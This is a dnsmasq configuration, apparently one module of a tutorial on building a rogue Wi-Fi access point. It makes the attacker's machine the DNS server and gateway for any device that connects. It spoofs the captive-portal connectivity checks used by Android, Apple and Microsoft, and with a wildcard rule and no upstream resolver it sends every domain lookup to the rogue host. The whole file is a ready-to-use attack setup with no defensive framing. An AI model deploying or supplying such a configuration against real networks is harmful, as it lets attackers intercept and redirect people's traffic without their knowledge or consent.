
# Module 3: dnsmasq Configuration (DHCP & Wildcard DNS Spoofing)

# Interface to listen on (Your Rogue AP Wi-Fi card)
interface=wlan0

# DHCP Configuration
# Format: dhcp-range=[start_ip],[end_ip],[netmask],[lease_time]
dhcp-range=192.168.1.10,192.168.1.50,255.255.255.0,12h


# Set Primary DNS Server (Option 6) to your Rogue AP IP
dhcp-option=6,192.168.1.1

# Set Gateway / Default Router (Option 3) to your Rogue AP IP
dhcp-option=3,192.168.1.1


# DNS Spoofing / Redirect (Captive Portal Engine)
address=/connectivitycheck.gstatic.com/192.168.1.1
address=/connectivitycheck.android.com/192.168.1.1
address=/clients3.google.com/192.168.1.1
address=/captive.apple.com/192.168.1.1
address=/msftconnecttest.com/192.168.1.1

# Wildcard DNS Spoofing: Redirects ALL requested domain names (#) to 192.168.1.1
address=/#/192.168.1.1

# Disable reading the system /etc/resolv.conf (Prevents real DNS lookups)
no-resolv


